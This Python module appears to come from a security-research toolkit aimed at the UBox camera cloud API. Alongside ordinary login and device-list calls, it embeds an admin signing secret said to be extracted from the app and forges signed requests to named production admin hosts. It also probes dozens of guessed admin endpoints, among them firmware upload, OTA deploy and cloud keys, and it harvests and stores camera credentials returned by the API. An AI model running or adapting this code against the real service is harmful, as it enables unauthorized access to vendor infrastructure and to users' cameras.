"""UBox cloud API client — authenticate, list devices, check firmware, etc.""" import hashlib import hmac import base64 import json import time import urllib.request import urllib.error from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT # ─── OAM (operator/admin) endpoint signing ─────────────────────── # Hardcoded secret extracted from com/http/OamHttpClient.java:28 OAM_BASE_URLS = [ "https://oam.ubianet.com/api", "https://dev.ubianet.com/oam/api", ] OAM_APPID = "30001" OAM_CLIENT_ID = "" # empty in app code; may need to be set per-deployment OAM_SECRET = "2894df25f8f740dff5266bc155c662ca" def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID, secret=OAM_SECRET): """ Reproduce com.http.Encryption.Hmac: sig_str = ":::" hmac = HmacSHA1(sig_str.utf8, secret.bytes) result = hex(hmac) """ sig_str = f"{ts_ms}:{appid}:{client_id}:{body_str}" h = hmac.new(secret.encode("utf-8"), sig_str.encode("utf-8"), hashlib.sha1) return h.hexdigest() def oam_post(endpoint, data, base_url=None): """ POST to an OAM endpoint with the OAM-SIGN header set. Tries each known OAM base URL if the first fails. """ body = json.dumps(data).encode("utf-8") body_str = body.decode("utf-8") ts_ms = str(int(time.time() * 1000)) sign = oam_sign(body_str, ts_ms) headers = { "Content-Type": "application/json", "OAM-SIGN": sign, "OAM-APPID": OAM_APPID, "CLIENT-ID": OAM_CLIENT_ID, "timestamp": ts_ms, "X-UbiaAPI-CallContext": "source=app&app=ubox&ver=1.1.360&osver=14", } bases = [base_url] if base_url else OAM_BASE_URLS last_err = None for b in bases: url = f"{b}/{endpoint}" log(f"OAM: POST {url}", C_INFO) log(f" sign-str = {ts_ms}:{OAM_APPID}::{body_str[:80]}", C_INFO) log(f" OAM-SIGN = {sign}", C_INFO) req = urllib.request.Request(url, data=body, method="POST", headers=headers) try: with urllib.request.urlopen(req, timeout=15) as resp: payload = json.loads(resp.read().decode("utf-8")) log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC) return payload except urllib.error.HTTPError as e: body_text = e.read().decode("utf-8", errors="replace")[:400] log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR) last_err = {"error": e.code, "body": body_text, "base": b} except Exception as e: log(f"OAM: error from {b}: {e}", C_ERROR) last_err = {"error": str(e), "base": b} return last_err or {"error": "all OAM bases failed"} def oam_fuzz(endpoints): """ Hit a list of candidate OAM endpoints with empty bodies and report which ones return non-404 responses (i.e. exist). """ results = {"hits": [], "404s": 0, "errors": 0, "tried": 0} for ep in endpoints: results["tried"] += 1 r = oam_post(ep, {}) if isinstance(r, dict): err = r.get("error") if err == 404: results["404s"] += 1 elif err is not None: results["errors"] += 1 results["hits"].append({"endpoint": ep, "error": err, "body": r.get("body", "")[:200]}) else: # Real JSON came back (msg=success or msg=fail with code) results["hits"].append({"endpoint": ep, "code": r.get("code"), "msg": r.get("msg"), "data": r.get("data")}) log(f"OAM-FUZZ: ✓ {ep} -> code={r.get('code')} msg={r.get('msg')}", C_IMPORTANT) log(f"OAM-FUZZ done: {len(results['hits'])} hits / {results['tried']} tried " f"({results['404s']} 404s, {results['errors']} errors)", C_SUCCESS) return results # Candidate OAM endpoints — confirmed in source + admin guesses OAM_ENDPOINT_GUESSES = [ # Confirmed in OamHttpClient.java "lgc/bind_err", "app/push_channel_reg", # Common admin patterns to probe "oam/users", "oam/user/list", "oam/user/info", "oam/devices", "oam/device/list", "oam/device/info", "oam/firmware", "oam/firmware/list", "oam/firmware/upload", "oam/ota", "oam/ota/list", "oam/ota/deploy", "oam/ota/push", "oam/config", "oam/cloud/config", "oam/cloud/keys", "oam/stats", "oam/dashboard", "oam/system", "oam/logs", "oam/audit", "oam/security", "user/list", "user/info", "user/all", "device/list", "device/info", "device/all", "firmware/list", "firmware/all", "firmware/latest", "ota/list", "ota/all", "ota/deploy", "admin/users", "admin/devices", "admin/firmware", "admin/config", "admin/system", "admin/stats", "stats", "dashboard", "system/info", "system/version", "lgc/bind_ok", "lgc/list", "lgc/info", "app/version", "app/config", "push/list", "push/send", "push/all", ] def hash_password(password): h = hmac.new(b"", password.encode("utf-8"), hashlib.sha1).digest() b64 = base64.b64encode(h).decode("utf-8") return b64.replace("+", "-").replace("/", "_").replace("=", ",") def api_post(base_url, endpoint, data, token=None): url = f"{base_url}/{endpoint}" body = json.dumps(data).encode("utf-8") req = urllib.request.Request(url, data=body, method="POST") req.add_header("Content-Type", "application/json") req.add_header("X-UbiaAPI-CallContext", "source=app&app=ubox&ver=1.1.360&osver=14") if token: req.add_header("X-Ubia-Auth-UserToken", token) try: with urllib.request.urlopen(req, timeout=15) as resp: return json.loads(resp.read().decode("utf-8")) except urllib.error.HTTPError as e: return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]} except Exception as e: return {"error": str(e)} def login(cfg): if not cfg["api_email"] or not cfg["api_password"]: log("API: set api_email and api_password first", C_ERROR) return False hashed = hash_password(cfg["api_password"]) data = { "account": cfg["api_email"], "password": hashed, "app": "ubox", "app_version": "1.1.360", "device_type": 1, "lang": "en", "brand": "Python", "device_token": "none", "regid_jg": "fail", "regid_xm": "fail", "regid_vivo": "fail", } log(f"API: logging in as {cfg['api_email']}...", C_INFO) result = api_post(cfg["api_base"], "v3/login", data) if result and result.get("msg") == "success": cfg["api_token"] = result["data"]["Token"] log(f"API: login OK — token={cfg['api_token'][:20]}...", C_SUCCESS) # Extract app_config keys app_cfg = result["data"].get("app_config", {}) if app_cfg: log(f"API: leaked app_config keys extracted", C_IMPORTANT) cfg.save() return True else: log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR) return False def devices(cfg): if not cfg["api_token"]: log("API: login first", C_ERROR) return [] result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"]) if result and result.get("msg") == "success": devs = result["data"].get("list", []) fw = result["data"].get("firmware_ver", []) log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS) for d in devs: uid = d.get("device_uid", "?") name = d.get("name", "?") cu = d.get("cam_user", "") cp = d.get("cam_pwd", "") model = d.get("model_num", "?") bat = d.get("battery", "?") log(f" [{uid}] {name} model={model} bat={bat}%", C_TRAFFIC) if cu and cp: log(f" LEAKED CREDS: {cu} / {cp}", C_IMPORTANT) cfg["device_uid"] = uid cfg["device_cam_user"] = cu cfg["device_cam_pwd"] = cp cfg.save() return devs else: log(f"API: {json.dumps(result)[:300]}", C_ERROR) return [] def check_firmware(cfg): if not cfg["api_token"] or not cfg["device_uid"]: log("API: login and get devices first", C_ERROR) return None result = api_post(cfg["api_base"], "user/qry/device/check_version/v3", { "device_uid": cfg["device_uid"], "host_version": "0.0.0.1", "wifi_version": "0.0.0.1", "is_lite": False, "zone_id": 2, }, cfg["api_token"]) log(f"API firmware: {json.dumps(result, indent=2)}", C_TRAFFIC) return result def device_services(cfg): if not cfg["api_token"] or not cfg["device_uid"]: log("API: login and get devices first", C_ERROR) return None result = api_post(cfg["api_base"], "user/qry/device/device_services", {"device_uid": cfg["device_uid"]}, cfg["api_token"]) log(f"API services: {json.dumps(result, indent=2)[:600]}", C_TRAFFIC) return result def raw_request(cfg, endpoint, data=None): if not cfg["api_token"]: log("API: login first", C_ERROR) return None log(f"API: POST {endpoint}", C_INFO) result = api_post(cfg["api_base"], endpoint, data or {}, cfg["api_token"]) log(f"API: {json.dumps(result, indent=2)[:800]}", C_TRAFFIC) return result def families(cfg): return raw_request(cfg, "user/families") def device_list_v2(cfg): return raw_request(cfg, "v2/user/device_list")